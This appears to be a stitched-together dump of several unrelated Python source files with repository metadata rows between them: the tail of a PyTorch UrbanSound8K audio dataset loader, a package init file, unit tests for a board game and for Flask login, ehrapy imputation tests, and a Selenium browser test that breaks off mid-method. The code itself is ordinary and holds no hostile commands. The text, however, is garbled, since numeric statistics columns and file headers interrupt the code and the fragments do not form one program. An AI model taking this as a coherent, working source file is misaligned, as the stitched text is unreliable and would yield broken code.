root = '/data/songhongwei/UrbanSound8K/audio/'
logger.info("Loading data from {}".format(root))
if not os.path.exists(root):
raise Exception("{} does not exists.".format(root))
feat_files = glob.glob(os.path.join(root, "**/*.wav"), recursive=True)
feat_set = set(feat_files)
val_files = glob.glob(os.path.join(root, "fold{}/*.wav".format(str(fold))))
val_set = set(val_files)
train_set = feat_set - val_set
self.all_files = feat_files
self.target_sr = target_sr
if split == "train":
self.files = list(train_set)
elif split == "valid":
self.files = val_files
elif split == "full":
self.files = feat_files
else:
raise ValueError("split not supported.")
self.transform = transform
logger.info("Loading fold {}, split {}, {} files".format(str(fold), split, len(self.files)))
def __getitem__(self, idx):
"""
:param idx:
:return: audio, label
"""
file = self.files[idx]
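        # FakePitchShift appears to operate on the file path itself (swapping in
        # a pre-shifted recording), so it is applied before the audio is loaded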
if isinstance(self.transform, FakePitchShift):
file = self.transform(file)
if isinstance(self.transform, Compose):
if isinstance(self.transform.transforms[0], FakePitchShift):
file = self.transform.transforms[0](file)
with torch.no_grad():
# (channels, frames)
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
# print(file, sr)
audio = self._process_audio(audio, sr, self.target_sr)
wav_name = os.path.basename(file)
label = int(wav_name.split('-')[1])
sample = (audio.requires_grad_(False), torch.as_tensor(label, dtype=torch.int64).requires_grad_(False))
if self.transform and not isinstance(self.transform, FakePitchShift):
sample = self.transform(sample)
return sample
def __len__(self):
return len(self.files)
@staticmethod
def _process_audio(audio, sr, target_sr):
if audio.size(0) == 2:
# Downmix if multichannel
audio = torch.mean(audio, dim=0, keepdim=True)
audio = audio[0]
if sr != target_sr:
audio = resampy.resample(audio.numpy(), sr_orig=sr, sr_new=target_sr, filter='kaiser_best')
audio = torch.as_tensor(audio, dtype=torch.float32)
# padding to 4 seconds audio on both side
target_len = target_sr * 4
pad_len = target_len - len(audio)
if pad_len > 0:
_pad = math.ceil(pad_len / 2)
if pad_len % 2 == 0:
audio = torch.nn.functional.pad(audio, [_pad, _pad])
else:
audio = torch.nn.functional.pad(audio, [_pad, _pad - 1])
assert audio.size(0) == target_len
if audio.size(0) > target_len:
audio = audio[:target_len]
return audio.requires_grad_(False)
def print(self):
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
print(file, sr, audio.size(1) / sr)
def get_flens(self):
self.flens = []
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
self.flens.append(audio.size(1) / sr)
return self.flens
@register_dataset
class UrbanSound8KRepeat(torch.utils.data.Dataset):
"""
    Pads clips shorter than 4 s up to 4 s by repeating the recording
    (instead of zero-padding on both sides as UrbanSound8K does).
    Sample rate differs from file to file; most recordings are 44100, 48000, or 96000 Hz.
"""
def __init__(self, fold, split, target_sr=44100, transform=None):
super(UrbanSound8KRepeat, self).__init__()
# load pre-saved resampled audio instead of resampling on the fly,
        # which is computationally expensive.
if target_sr == 44100:
root = '/data/songhongwei/UrbanSound8K/audio44100/'
elif target_sr == 22050:
root = '/data/songhongwei/UrbanSound8K/audio22050/'
else:
root = '/data/songhongwei/UrbanSound8K/audio/'
logger.info("Loading data from {}".format(root))
if not os.path.exists(root):
raise Exception("{} does not exists.".format(root))
feat_files = glob.glob(os.path.join(root, "**/*.wav"), recursive=True)
feat_set = set(feat_files)
val_files = glob.glob(os.path.join(root, "fold{}/*.wav".format(str(fold))))
val_set = set(val_files)
train_set = feat_set - val_set
self.all_files = feat_files
self.target_sr = target_sr
if split == "train":
self.files = list(train_set)
elif split == "valid":
self.files = val_files
elif split == "full":
self.files = feat_files
else:
raise ValueError("split not supported.")
self.transform = transform
logger.info("Loading fold {}, split {}, {} files".format(str(fold), split, len(self.files)))
def __getitem__(self, idx):
"""
:param idx:
:return: audio, label
"""
file = self.files[idx]
if isinstance(self.transform, FakePitchShift):
file = self.transform(file)
if isinstance(self.transform, Compose):
if isinstance(self.transform.transforms[0], FakePitchShift):
file = self.transform.transforms[0](file)
with torch.no_grad():
# (channels, frames)
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
# print(file, sr)
audio = self._process_audio(audio, sr, self.target_sr)
wav_name = os.path.basename(file)
label = int(wav_name.split('-')[1])
sample = (audio.requires_grad_(False), torch.as_tensor(label, dtype=torch.int64).requires_grad_(False))
if self.transform and not isinstance(self.transform, FakePitchShift):
sample = self.transform(sample)
return sample
def __len__(self):
return len(self.files)
def _process_audio(self, audio, sr, target_sr):
if audio.size(0) == 2:
# Downmix if multichannel
audio = torch.mean(audio, dim=0, keepdim=True)
audio = audio[0]
if sr != target_sr:
audio = resampy.resample(audio.numpy(), sr_orig=sr, sr_new=target_sr, filter='kaiser_best')
audio = torch.as_tensor(audio, dtype=torch.float32)
        # zero-pad clips shorter than 1 s up to 1 s first, so the repeat below
        # needs at most 4 copies
pad_zero_len = target_sr - len(audio)
if pad_zero_len > 0:
audio = self.pad_zero(audio, pad_zero_len)
# padding to 4 seconds audio on both side
target_len = target_sr * 4
pad_len = target_len - len(audio)
if pad_len > 0:
n_repeat = math.ceil(target_len / len(audio))
audio = audio.repeat(n_repeat)[:target_len]
if audio.size(0) > target_len:
audio = audio[:target_len]
return audio.requires_grad_(False)
def pad_zero(self, audio, pad_zero_len):
if pad_zero_len > 0:
_pad = math.ceil(pad_zero_len / 2)
if pad_zero_len % 2 == 0:
audio = torch.nn.functional.pad(audio, [_pad, _pad])
else:
audio = torch.nn.functional.pad(audio, [_pad, _pad - 1])
return audio
def print(self):
"""
print file name, sr, and length in seconds.
"""
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
print(file, sr, audio.size(1) / sr)
def get_flens(self):
"""
file length in seconds.
"""
self.flens = []
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
self.flens.append(audio.size(1) / sr)
return self.flens
def raw_by_id(self, idx):
"""
load raw wave by file idx.
"""
audio, sr = torchaudio.load(filepath=self.files[idx], normalization=lambda x: torch.abs(x).max(),
channels_first=True)
wavname = os.path.basename(self.files[idx])
return audio[0], wavname.split('-')[1]
@register_dataset
class UrbanSound8KCached(torch.utils.data.Dataset):
"""
    Caches the decoded (and resampled) waveforms in memory so resampling does
    not have to be repeated on every batch.
"""
def __init__(self, fold, split, target_sr=44100, transform=None):
super(UrbanSound8KCached, self).__init__()
root = '/data/songhongwei/UrbanSound8K/audio/'
if not os.path.exists(root):
raise Exception("{} does not exists.".format(root))
feat_files = glob.glob(os.path.join(root, "**/*.wav"), recursive=True)
feat_set = set(feat_files)
val_files = glob.glob(os.path.join(root, "fold{}/*.wav".format(str(fold))))
val_set = set(val_files)
train_set = feat_set - val_set
self.all_files = feat_files
self.target_sr = target_sr
if split == "train":
self.files = list(train_set)
elif split == "valid":
self.files = val_files
elif split == "full":
self.files = feat_files
else:
raise ValueError("split not supported.")
self.transform = transform
logger.info("Loading fold {}, split {}, {} files".format(str(fold), split, len(self.files)))
self.samples = self._cache_audio()
def _cache_audio(self):
samples = []
for file in tqdm(self.files):
# (channels, frames)
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
# print(file, sr)
audio = self._process_audio(audio, sr, self.target_sr)
wav_name = os.path.basename(file)
label = int(wav_name.split('-')[1])
samples.append((audio.requires_grad_(False),
torch.as_tensor(label, dtype=torch.int64).requires_grad_(False)))
return samples
def __getitem__(self, idx):
"""
:param idx:
:return: audio, label
"""
return self.samples[idx]
def __len__(self):
return len(self.files)
@staticmethod
def _process_audio(audio, sr, target_sr):
if audio.size(0) == 2:
# Downmix if multichannel
audio = torch.mean(audio, dim=0, keepdim=True)
audio = audio[0]
if sr != target_sr:
audio = resampy.resample(audio.numpy(), sr_orig=sr, sr_new=target_sr, filter='kaiser_best')
audio = torch.as_tensor(audio, dtype=torch.float32)
# padding to 4 seconds audio on both side
target_len = target_sr * 4
pad_len = target_len - len(audio)
if pad_len > 0:
_pad = math.ceil(pad_len / 2)
if pad_len % 2 == 0:
audio = torch.nn.functional.pad(audio, [_pad, _pad])
else:
audio = torch.nn.functional.pad(audio, [_pad, _pad - 1])
assert audio.size(0) == target_len
if audio.size(0) > target_len:
audio = audio[:target_len]
return audio.requires_grad_(False)
def print(self):
for file in self.all_files:
audio, sr = torchaudio.load(filepath=file, normalization=lambda x: torch.abs(x).max(), channels_first=True)
print(file, sr, audio.size(1) / sr)
if __name__ == '__main__':
dataset = UrbanSound8KRepeat(fold=2, split='train', target_sr=22050)
# dataset.output_sr_length()
# for data in dataset:
# dataset.print()
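    # typical DataLoader hookup (sketch; batch size and worker count are arbitrary):
    # loader = torch.utils.data.DataLoader(dataset, batch_size=32, shuffle=True, num_workers=4)
    # for audio, label in loader:
    #     pass  # audio: (32, 88200) float32 at 22050 Hz; label: (32,) int64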
for d in dataset:
pass | 35.297814 | 119 | 0.595325 | 1,606 | 12,919 | 4.617684 | 0.118929 | 0.032362 | 0.012136 | 0.025485 | 0.818905 | 0.807174 | 0.804746 | 0.804746 | 0.804746 | 0.799218 | 0 | 0.019077 | 0.285858 | 12,919 | 366 | 120 | 35.297814 | 0.784739 | 0.078179 | 0 | 0.811245 | 0 | 0 | 0.060144 | 0.023903 | 0 | 0 | 0 | 0 | 0.008032 | 1 | 0.080321 | false | 0.004016 | 0.052209 | 0.012048 | 0.200803 | 0.024096 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
421e652e0c67555b1a75ce3ea7e253e2f6e3eb6a | 103 | py | Python | fastapi_rest_jsonapi/data/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | 2 | 2022-03-01T00:59:04.000Z | 2022-03-03T06:17:51.000Z | fastapi_rest_jsonapi/data/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | 9 | 2022-01-16T15:47:35.000Z | 2022-03-28T18:47:18.000Z | fastapi_rest_jsonapi/data/__init__.py | Zenor27/fastapi-rest-jsonapi | 1c6eaad0791949bbaf9f4032fb7ecd483e80a02a | [
"MIT"
] | null | null | null | # flake8: noqa
from .data_layer import DataLayer
from .sqlachemy_data_layer import SQLAlchemyDataLayer
| 25.75 | 53 | 0.854369 | 13 | 103 | 6.538462 | 0.692308 | 0.211765 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.106796 | 103 | 3 | 54 | 34.333333 | 0.913043 | 0.116505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
42243bbfbe0044e88e1cdf84bbd867c2ac580196 | 5,427 | py | Python | tests/tests_removing_tokens.py | pfertyk/aton-core | 72e5a92576cfe2996dc428a1cf801a537174858a | [
"Unlicense"
] | null | null | null | tests/tests_removing_tokens.py | pfertyk/aton-core | 72e5a92576cfe2996dc428a1cf801a537174858a | [
"Unlicense"
] | null | null | null | tests/tests_removing_tokens.py | pfertyk/aton-core | 72e5a92576cfe2996dc428a1cf801a537174858a | [
"Unlicense"
] | null | null | null | import json
from unittest import TestCase
from unittest.mock import Mock
from main import AtonCore, State
class TestRemovingTokens(TestCase):
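    """End-to-end checks of the RemovingTokens state: which player removes
    tokens, whose tokens are targeted, when the removal order is skipped, and
    when removal is applied automatically (behaviour inferred from the
    assertions below)."""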
def test_orders_player_to_remove_opponents_tokens(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 3, 4]
for i in range(4):
aton.temples[i].tokens[0] = 'blue'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'remove_tokens',
'player': 'red',
'token_owner': 'blue',
'number_of_tokens': 2,
'max_available_temple': 3,
}))
def test_orders_player_to_remove_own_tokens(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 3, 4]
for i in range(4):
aton.temples[i].tokens[0] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'remove_tokens',
'player': 'red',
'token_owner': 'red',
'number_of_tokens': 1,
'max_available_temple': 3,
}))
def test_no_notification_when_no_tokens_should_be_removed(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 2, 3, 4]
for i in range(4):
aton.temples[i].tokens[0] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_no_opponents_tokens_available(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 3, 4]
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_no_own_tokens_available(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 3, 4]
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_opponents_tokens_in_unavailable_temple(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 3, 4]
for i in range(4):
aton.temples[3].tokens[i] = 'blue'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_no_notification_when_own_tokens_in_unavailable_temple(self):
def notifier(message):
self.assertNotIn('remove_tokens', message)
notifiers = [notifier, notifier]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 3, 4]
for i in range(4):
aton.temples[3].tokens[i] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
def test_automatically_remove_opponents_tokens_when_possible(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 4, 4, 4]
for i in range(2):
aton.temples[i].tokens[i] = 'blue'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'tokens_removed',
'removing_player': 'red',
'token_owner': 'blue',
'removed_tokens': [[0], [1], [], []]
}))
for temple_index, temple in enumerate(aton.temples):
for token in temple.tokens:
self.assertNotEqual(token, 'blue', 'Temple {}: {}'.format(
temple_index, temple.tokens))
def test_automatically_remove_own_tokens_when_possible(self):
notifiers = [Mock(), Mock()]
aton = AtonCore(notifiers)
red = aton.red
red.cartouches = [1, 1, 1, 4]
for i in range(4):
aton.temples[i].tokens[5] = 'red'
aton.current_player = aton.red
aton.state = State.RemovingTokens
aton.start()
for notifier in notifiers:
notifier.assert_called_with(json.dumps({
'message': 'tokens_removed',
'removing_player': 'red',
'token_owner': 'red',
'removed_tokens': [[5], [], [], []]
}))
temple = aton.temples[0]
for token in temple.tokens:
self.assertNotEqual(token, 'red', 'Temple {}: {}'.format(
0, temple.tokens))
| 32.692771 | 79 | 0.569191 | 597 | 5,427 | 4.99665 | 0.113903 | 0.051626 | 0.063359 | 0.07241 | 0.853503 | 0.844787 | 0.804894 | 0.804894 | 0.774723 | 0.774723 | 0 | 0.015684 | 0.318592 | 5,427 | 165 | 80 | 32.890909 | 0.790968 | 0 | 0 | 0.76259 | 0 | 0 | 0.076654 | 0 | 0 | 0 | 0 | 0 | 0.079137 | 1 | 0.100719 | false | 0 | 0.028777 | 0 | 0.136691 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
427fc4ca2f96d828fb861def4726c13b73a83e40 | 2,179 | py | Python | tests/test_login.py | ccolunga/flask_movie_api | e56ecfd2c482290221256fa3e4876090a5618b94 | [
"MIT"
] | null | null | null | tests/test_login.py | ccolunga/flask_movie_api | e56ecfd2c482290221256fa3e4876090a5618b94 | [
"MIT"
] | null | null | null | tests/test_login.py | ccolunga/flask_movie_api | e56ecfd2c482290221256fa3e4876090a5618b94 | [
"MIT"
] | null | null | null | import json
from tests.BaseCase import BaseCase
class TestUserLogin(BaseCase):
def test_successful_login(self):
# Given
email = "exam@gmail.com"
password = "strongpassword"
payload = json.dumps({
"email": email,
"password": password
})
response = self.app.post(
'/api/auth/signup', headers={"Content-Type": "application/json"}, data=payload)
# When
response = self.app.post(
'/api/auth/login', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual(str, type(response.json['token']))
self.assertEqual(200, response.status_code)
def test_login_with_invalid_email(self):
# Given
email = "exam@gmail.com"
password = "strongpassword"
payload = {
"email": email,
"password": password
}
response = self.app.post(
'/api/auth/signup', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# When
payload['email'] = "exam@gmail.com"
response = self.app.post(
'/api/auth/login', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# Then
self.assertEqual("Invalid username or password",
response.json['message'])
self.assertEqual(401, response.status_code)
def test_login_with_invalid_password(self):
# Given
email = "exam@gmail.com"
password = "strongpassword"
payload = {
"email": email,
"password": password
}
response = self.app.post(
'/api/auth/signup', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# When
payload['password'] = "myverycoolpassword"
response = self.app.post(
'/api/auth/login', headers={"Content-Type": "application/json"}, data=json.dumps(payload))
# Then
self.assertEqual("Invalid username or password",
response.json['message'])
self.assertEqual(401, response.status_code)
| 32.044118 | 103 | 0.57274 | 216 | 2,179 | 5.717593 | 0.217593 | 0.0583 | 0.072874 | 0.092308 | 0.822672 | 0.822672 | 0.822672 | 0.811336 | 0.759514 | 0.71498 | 0 | 0.00584 | 0.292795 | 2,179 | 67 | 104 | 32.522388 | 0.795587 | 0.02157 | 0 | 0.652174 | 0 | 0 | 0.237512 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 1 | 0.065217 | false | 0.217391 | 0.043478 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
c459c8ae2b2b6541ecea45d35d457ab380b7ec19 | 5,792 | py | Python | tests/api/preprocessing/test_imputation.py | theislab/ehrapy | a71391708e49df7c6b78c4329fe9e0368c6a4a79 | [
"Apache-2.0"
] | 8 | 2021-06-11T13:02:37.000Z | 2022-02-13T15:30:36.000Z | tests/api/preprocessing/test_imputation.py | theislab/ehrapy | a71391708e49df7c6b78c4329fe9e0368c6a4a79 | [
"Apache-2.0"
] | 196 | 2021-06-15T07:56:05.000Z | 2022-03-30T07:26:52.000Z | tests/api/preprocessing/test_imputation.py | theislab/ehrapy | a71391708e49df7c6b78c4329fe9e0368c6a4a79 | [
"Apache-2.0"
] | 1 | 2022-02-02T14:12:25.000Z | 2022-02-02T14:12:25.000Z | from pathlib import Path
import numpy as np
import pytest
from ehrapy.api.io import read
from ehrapy.api.preprocessing import explicit_impute, knn_impute, miss_forest_impute, simple_impute
from ehrapy.api.preprocessing._data_imputation import ImputeStrategyNotAvailableError
CURRENT_DIR = Path(__file__).parent
_TEST_PATH = f"{CURRENT_DIR}/test_data_imputation"
class TestImputation:
def test_mean_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata)
assert id(adata) == id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_mean_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata, copy=True)
assert id(adata) != id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_mean_impute_throws_error_non_numerical(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
with pytest.raises(ImputeStrategyNotAvailableError):
_ = simple_impute(adata)
def test_mean_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, var_names=["intcol", "indexcol"])
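        # NaN is the only value unequal to itself, so `item != item` flags missing entries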
assert not np.all([item != item for item in adata_imputed.X[::, 1:2]])
assert np.any([item != item for item in adata_imputed.X[::, 3:4]])
def test_median_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata, strategy="median")
assert id(adata) == id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_median_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = simple_impute(adata, strategy="median", copy=True)
assert id(adata) != id(adata_imputed)
assert not np.isnan(adata_imputed.X).any()
def test_median_impute_throws_error_non_numerical(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
with pytest.raises(ImputeStrategyNotAvailableError):
_ = simple_impute(adata, strategy="median")
def test_median_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, var_names=["intcol", "indexcol"], strategy="median")
assert not np.all([item != item for item in adata_imputed.X[::, 1:2]])
assert np.any([item != item for item in adata_imputed.X[::, 3:4]])
def test_most_frequent_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, strategy="most_frequent")
assert id(adata) == id(adata_imputed)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_most_frequent_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, strategy="most_frequent", copy=True)
assert id(adata) != id(adata_imputed)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_most_frequent_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = simple_impute(adata, var_names=["intcol", "strcol"], strategy="most_frequent")
assert not (np.all([item != item for item in adata_imputed.X[::, 1:3]]))
def test_knn_impute_no_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = knn_impute(adata)
assert id(adata) == id(adata_imputed)
def test_knn_impute_copy(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = knn_impute(adata, copy=True)
assert id(adata) != id(adata_imputed)
def test_knn_impute_non_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = knn_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_knn_impute_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = knn_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_missforest_impute_non_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = miss_forest_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_missforest_impute_numerical_data(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = miss_forest_impute(adata)
assert not (np.all([item != item for item in adata_imputed.X]))
def test_missforest_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = miss_forest_impute(adata, var_names={"non_numerical": ["intcol"], "numerical": ["strcol"]})
assert not (np.all([item != item for item in adata_imputed.X]))
def test_explicit_impute_all(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute_num.csv")
adata_imputed = explicit_impute(adata, replacement=1011)
assert (adata_imputed.X == 1011).sum() == 3
def test_explicit_impute_subset(self):
adata = read(dataset_path=f"{_TEST_PATH}/test_impute.csv")
adata_imputed = explicit_impute(adata, replacement={"strcol": "REPLACED", "intcol": 1011})
assert (adata_imputed.X == 1011).sum() == 1
assert (adata_imputed.X == "REPLACED").sum() == 1
| 40.503497 | 115 | 0.69337 | 813 | 5,792 | 4.615006 | 0.093481 | 0.143923 | 0.069296 | 0.10661 | 0.857676 | 0.850746 | 0.850746 | 0.818763 | 0.818763 | 0.818763 | 0 | 0.006155 | 0.186464 | 5,792 | 142 | 116 | 40.788732 | 0.79011 | 0 | 0 | 0.510204 | 0 | 0 | 0.137949 | 0.109461 | 0 | 0 | 0 | 0 | 0.27551 | 1 | 0.204082 | false | 0 | 0.061224 | 0 | 0.27551 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c4760c38b1f8d6e21aca3bc8922b47e4c9fc4fb2 | 18,137 | py | Python | src_test/test.py | VoidMats/MapAnalyze | c4947fae1fcffa2def7eb6c6ba907fdd467a92f8 | [
"MIT"
] | null | null | null | src_test/test.py | VoidMats/MapAnalyze | c4947fae1fcffa2def7eb6c6ba907fdd467a92f8 | [
"MIT"
] | null | null | null | src_test/test.py | VoidMats/MapAnalyze | c4947fae1fcffa2def7eb6c6ba907fdd467a92f8 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
from selenium.webdriver.common.action_chains import ActionChains
import time
import unittest
path = "http://localhost:1234"
class PythonTest(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
def test_layers(self):
print("************ Test layers ****************")
driver = self.driver
driver.get(path)
element = driver.find_element_by_xpath("//ol[@id='allLayers']")
#self.assertIn(null, element)
#Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
#Check allLayers Ol for entries
parentElement = driver.find_element_by_id("allLayers")
elementList = parentElement.find_elements_by_tag_name("li")
assert len(elementList) == 0
print("len(elementList): " + str(len(elementList)))
#Add layers
driver.find_element_by_id("openAddLayerModal").click()
driver.find_element_by_id("units").send_keys("2")
driver.find_element_by_id("addLayer").click()
#Check allLayers Ol for entries
elementList = parentElement.find_elements_by_tag_name("li")
assert len(elementList) == 1
print("len(elementList): " + str(len(elementList)))
time.sleep(1)
def test_inputs(self):
print("************ Test input ****************")
driver = self.driver
driver.get(path)
#Open sidebar
driver.find_element_by_id("btnOpenSidebar").click()
#Go to NetworkTab
driver.find_element_by_id("tabSidebarNetwork").click()
element = driver.find_element_by_id("epochsChoice")
element.clear()
element.send_keys("10")
print("Element value: " + element.get_attribute('value'))
assert( element.get_attribute('value') == "10" )
element = driver.find_element_by_id("learningRate")
element.clear()
element.send_keys("0.1")
print("Element value: " + element.get_attribute('value'))
assert( element.get_attribute('value') == "0.1" )
element = driver.find_element_by_id("lossChoice")
element.clear()
element.send_keys("SeleniumTest")
print("Element value: " + element.get_attribute('value'))
assert( element.get_attribute('value') == "SeleniumTest" )
element = Select(driver.find_element_by_id('optimizerChoice'))
element.select_by_visible_text("adagrad")
print("Element value: " + element.first_selected_option.text)
assert(element.first_selected_option.text == "adagrad")
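# WebDriverWait and expected_conditions are imported above but never used; a
# hedged alternative to the fixed time.sleep() calls in the tests below could
# look like this (By would additionally need
# `from selenium.webdriver.common.by import By`; this is a sketch, not part
# of the original flow):
#   WebDriverWait(driver, 10).until(
#       EC.visibility_of_element_located((By.ID, "setPolygonCategoryModal")))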
def test_class(self):
print("************ Test class ****************")
sleeptime = 0
driver = self.driver
driver.get(path)
driver.maximize_window()
driver.find_element_by_id("btnOpenSidebar").click()
#element = driver.find_element_by_id("downloadPolygons")
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown: " + str(modal.is_displayed()))
assert(modal.is_displayed() == False)
# From wherever the mouse is, move by a fixed offset into the browser's map area and start clicking out a polygon
action = ActionChains(driver)
action.move_by_offset(500, 700)
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(100))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(100), int(0))
action.click().perform()
time.sleep(sleeptime)
action = ActionChains(driver)
action.move_by_offset(int(0), int(-50))
action.click().perform()
action.click().perform()
time.sleep(2)
# Check if modal is shown
modal = driver.find_element_by_id("setPolygonCategoryModal")
print("Dialog is shown at close: " + str(modal.is_displayed()))
assert(modal.is_displayed() == True)
# Adding name to class
element = driver.find_element_by_id("newPolygonCategory")
element.clear()
